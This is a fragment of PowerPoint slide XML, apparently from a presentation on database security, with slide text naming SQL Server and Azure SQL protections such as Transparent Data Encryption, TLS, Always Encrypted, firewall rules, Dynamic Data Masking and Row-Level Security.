              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="93233" tIns="46616" rIns="93233" bIns="46616" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932201" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr kumimoji="0" lang="en-US" sz="1630" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Freeform 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3123491" y="2610224"/>
            <a:ext cx="2183674" cy="811054"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5779008"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1097280 w 5779008"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 5779008 w 5779008"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6256679"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1097280 w 6256679"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 6256679 w 6256679"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6256679"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1217860 w 6256679"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 6256679 w 6256679"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5493004"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1217860 w 5493004"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 5493004 w 5493004"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5837249"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1217860 w 5837249"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 5837249 w 5837249"/>
              <a:gd name="connsiteY2" fmla="*/ 5379 h 341376"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6020129"/>
              <a:gd name="connsiteY0" fmla="*/ 341376 h 341376"/>
              <a:gd name="connsiteX1" fmla="*/ 1217860 w 6020129"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 341376"/>
              <a:gd name="connsiteX2" fmla="*/ 6020129 w 6020129"/>
              <a:gd name="connsiteY2" fmla="*/ 16809 h 341376"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6020129" h="341376">
                <a:moveTo>
                  <a:pt x="0" y="341376"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1217860" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020129" y="16809"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="90000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="oval"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04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6" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976184" y="1937805"/>
            <a:ext cx="5839740" cy="1954381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protect Data </a:t>
            </a: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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Encryption at rest	          	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Transparent Data Encryption</a:t>
            </a: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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="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Backup Encryption</a:t>
            </a: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			Cell-level encryption</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Encryption in transit         	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Transport Layer Security (SSL/TLS)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Encryption in use (client)   	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Always Encrypted</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049"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latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4947841" y="2242706"/>
            <a:ext cx="718646" cy="718646"/>
            <a:chOff x="9315540" y="2260675"/>
            <a:chExt cx="718850" cy="718850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Oval 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9315540" y="2260675"/>
              <a:ext cx="718850" cy="718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9" name="Rounded Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9513302" y="2381112"/>
              <a:ext cx="323327" cy="477976"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="507037" h="749752">
                  <a:moveTo>
                    <a:pt x="253519" y="339042"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204663" y="339042"/>
                    <a:pt x="165058" y="378647"/>
                    <a:pt x="165058" y="427503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165058" y="457766"/>
                    <a:pt x="180255" y="484480"/>
                    <a:pt x="203474" y="500373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="177838" y="653426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329199" y="653426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303565" y="500373"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="326783" y="484480"/>
                    <a:pt x="341980" y="457766"/>
                    <a:pt x="341980" y="427503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341980" y="378647"/>
                    <a:pt x="302375" y="339042"/>
                    <a:pt x="253519" y="339042"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="289130" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="363198" y="-1860"/>
                    <a:pt x="432293" y="36794"/>
                    <a:pt x="468760" y="100561"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="421696" y="126869"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="395009" y="80598"/>
                    <a:pt x="344595" y="52570"/>
                    <a:pt x="290565" y="53964"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236467" y="55360"/>
                    <a:pt x="187565" y="86026"/>
                    <a:pt x="163410" y="133701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145935" y="168192"/>
                    <a:pt x="143492" y="207468"/>
                    <a:pt x="156009" y="242715"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="422529" y="242715"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="469202" y="242715"/>
                    <a:pt x="507037" y="280550"/>
                    <a:pt x="507037" y="327223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="507037" y="665244"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="507037" y="711917"/>
                    <a:pt x="469202" y="749752"/>
                    <a:pt x="422529" y="749752"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84508" y="749752"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="37836" y="749752"/>
                    <a:pt x="0" y="711917"/>
                    <a:pt x="0" y="665244"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="327223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280550"/>
                    <a:pt x="37836" y="242715"/>
                    <a:pt x="84508" y="242715"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="101166" y="242715"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88947" y="199061"/>
                    <a:pt x="93917" y="151930"/>
                    <a:pt x="115014" y="109936"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148003" y="44269"/>
                    <a:pt x="214993" y="1998"/>
                    <a:pt x="289130" y="68"/>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33" tIns="46616" rIns="46616" bIns="93233" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931932" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1836" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-51" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3433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75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75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75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p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>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400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Translated to SQL technologies...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542362" y="1676603"/>
            <a:ext cx="2043139" cy="2161415"/>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745"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Manage</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="295649" y="2452729"/>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2</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 name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D0E828-D71F-4DA4-BD18-163AC1B0D30C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8533436" y="1113565"/>
            <a:ext cx="1716429" cy="56116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Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA20704-BBC2-42A7-8F95-F3D74908C3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7814117" y="1676400"/>
            <a:ext cx="4276283" cy="2166053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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Windows authentication, Azure AD authentication, role-base security…</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Azure SQL Firewall</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Dynamic Data Masking, Row-Level Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF5732A-3C26-40FB-AB35-9D73580DBE14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951151" y="1113565"/>
            <a:ext cx="1245915" cy="56116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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2496443" y="1676401"/>
            <a:ext cx="5262882" cy="2159000"/>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Manage authentication and authorization mechanisms</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Properly configure database firewall</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Limit application access according to authorization principles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E00171-866D-4B97-9DAA-BC002C6D51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1682" y="3919602"/>
            <a:ext cx="2831500" cy="2883715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02D08367-0625-45E4-A959-5BF77D0FFE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7116" y="4683716"/>
            <a:ext cx="2428486" cy="1055341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA4B7F3-4410-430A-9D2D-F11AC1AA3424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1241055" y="4005943"/>
            <a:ext cx="4767859" cy="2634790"/>
            <a:chOff x="2103437" y="1763542"/>
            <a:chExt cx="6062892" cy="3692241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Cloud large">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74888B56-854E-4107-B7C8-06D4D28A6665}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="2103437" y="1763542"/>
              <a:ext cx="6062892" cy="2359402"/>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00B0F0"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="89617" tIns="44808" rIns="89617" bIns="44808"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567" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Active Directory">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6292F54-59FB-4A5D-969D-1D4CEE1B140C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3255848" y="2252933"/>
              <a:ext cx="1743669" cy="1170949"/>
              <a:chOff x="5666494" y="1929450"/>
              <a:chExt cx="1737360" cy="1457271"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Isosceles Triangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A926C874-A965-422C-8966-489050714484}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6040264" y="2655023"/>
                <a:ext cx="848770" cy="731698"/>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613" tIns="44806" rIns="89613" bIns="44806" numCol="1" rtlCol="0" anchor="ctr" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="895748" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr kumimoji="0" lang="en-US" sz="2157"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mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="TextBox 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752CC2C6-4D84-40C9-9908-0CCCB5153306}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5666494" y="1929450"/>
                <a:ext cx="1737360" cy="841498"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="896181" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzPct val="80000"/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1567" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="FCFCFC">
                        <a:alpha val="99000"/>
                      </a:srgbClr>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semilight"/>
